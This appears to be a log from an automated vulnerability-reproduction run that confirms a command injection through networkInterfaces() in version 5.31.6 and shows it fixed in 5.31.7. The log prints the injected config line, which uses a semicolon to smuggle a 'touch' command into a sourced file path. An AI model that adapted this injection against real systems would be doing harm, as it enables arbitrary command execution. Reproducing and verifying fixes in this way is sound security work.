[08:12:10] Reusing prepared project cache repo at /data/pruva/project-cache/ebe61b2a-f601-4416-916e-129c2338e243/repo [08:12:10] Repo ready at /data/pruva/project-cache/ebe61b2a-f601-4416-916e-129c2338e243/repo [08:12:10] Setting up controlled /etc/network/interfaces source chain [08:12:10] Backed up existing /etc/network/interfaces to /data/pruva/runs/871f48bd-5e2c-49d2-b789-559e145055b3/bundle/logs/interfaces.backup [08:12:10] Contents of /etc/network/interfaces: auto lo$ iface lo inet loopback$ source /etc/network/interfaces.d/pruva_benign.cfg$ source /tmp/pruva_inj_nonexist;touch^I/tmp/pruva_cve_2026_50289_marker$ [08:12:10] === vulnerable_5_31_6 : checking out da1cbf5eb09907cf5c3431f4c9ea441b7a227617 === [08:12:10] vulnerable_5_31_6 resolved HEAD=da1cbf5eb09907cf5c3431f4c9ea441b7a227617 tag=v5.31.6 [08:12:10] vulnerable_5_31_6 marker pre-state: absent (forced clean) [08:12:10] vulnerable_5_31_6 raw output: NETWORK_INTERFACES_RESOLVED marker_exists=true iface_count=2 [08:12:10] vulnerable_5_31_6 RESULT: marker CREATED (command injection observed) [08:12:10] === fixed_5_31_7 : checking out bbfddde48672d0ee124fefdb3cb4442fd9dd4f03 === [08:12:10] fixed_5_31_7 resolved HEAD=bbfddde48672d0ee124fefdb3cb4442fd9dd4f03 tag=v5.31.6-1-gbbfddde [08:12:10] fixed_5_31_7 marker pre-state: absent (forced clean) [08:12:11] fixed_5_31_7 raw output: NETWORK_INTERFACES_RESOLVED marker_exists=false iface_count=2 [08:12:11] fixed_5_31_7 RESULT: marker ABSENT (no command injection) [08:12:11] Restoring original /etc/network/interfaces [08:12:11] === SUMMARY === [08:12:11] vulnerable 5.31.6 marker created : true [08:12:11] fixed 5.31.7 marker created : false [08:12:11] VERDICT: CONFIRMED - command injection via public networkInterfaces() on 5.31.6; absent on fixed 5.31.7 [08:12:11] Done. confirmed=true